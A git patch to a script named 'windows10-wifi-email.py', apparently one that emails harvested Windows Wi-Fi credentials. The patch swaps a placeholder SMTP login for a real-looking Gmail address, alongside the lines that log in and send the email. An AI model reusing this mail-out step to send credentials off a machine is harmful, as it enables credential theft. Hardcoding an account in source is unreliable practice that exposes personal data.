From 7e5fd66a23be4f58352d74b2cbb4d84cfeadff98 Mon Sep 17 00:00:00 2001 From: mandciph <34348830+mandciph@users.noreply.github.com> Date: Sun, 28 Aug 2022 07:20:53 -0400 Subject: [PATCH] Update windows10-wifi-email.py --- windows10-wifi-email.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/windows10-wifi-email.py b/windows10-wifi-email.py index d8e40f8..0f5df66 100644 --- a/windows10-wifi-email.py +++ b/windows10-wifi-email.py @@ -68,6 +68,6 @@ # Connect securely to server smtp.starttls() # Login using username and password to dummy email. Remember to set email to allow less secure apps if using Gmail - smtp.login("login_name", "password") + smtp.login("mikemuffo@gmail.com", "password") # Send email. smtp.send_message(email)